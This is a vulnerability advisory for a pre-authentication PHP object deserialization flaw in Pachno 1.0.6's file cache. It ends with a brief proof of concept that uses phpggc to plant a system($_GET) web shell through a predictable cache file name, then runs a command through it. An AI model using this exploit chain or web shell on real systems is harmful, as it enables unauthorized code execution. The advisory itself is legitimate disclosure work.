📄 Pachno 1.0.6 FileCache Deserialization Remote Code Execution

Pachno 1.0.6 FileCache Deserialization Remote Code Execution
    
    
    Vendor: Daniel André Eikeland
    Product web page: https://github.com/pachno/pachno
    Affected version: 1.0.6
    
    Summary: Pachno is an open-source collaboration platform (formerly known as The Bug
    Genie) designed for team project management, issue tracking, and documentation. It
    offers a module-based, customizable environment for software development and team
    workflows, distributed under the Mozilla Public License.
    
    Desc: The application uses unserialize() function on the contents of cache files
    stored under {PACHNO_PATH}/cache/ during the framework bootstrap sequence, before
    any authentication, routing, or controller logic is executed. Cache files are created
    with world-writable permissions (chmod 0666) and use deterministic, predictable
    filenames derived from a small set of constants. An attacker who can write to the
    cache directory can inject a serialized PHP object payload that triggers arbitrary
    code execution on the next HTTP request.
    
    Tested on: GNU/Linux
               Apache2
               PHP/7.4
               MySQL/5.7 (MariaDB)
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2026-5986
    Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5986
    
    
    06.04.2026
    
    --
    
    
    # ./phpggc SwiftMailer/FW1 /var/www/html/public/cmd.php '<?php system($_GET["c"]); ?>' -s > chaka.bin
    # sleep 1
    ...
    ...
    $ cp chaka.bin /var/www/html/cache/_configuration-2142a.cache
    $ sleep 17
    $ curl "https://127.0.0.1/cmd.php?c=whoami"
    www-data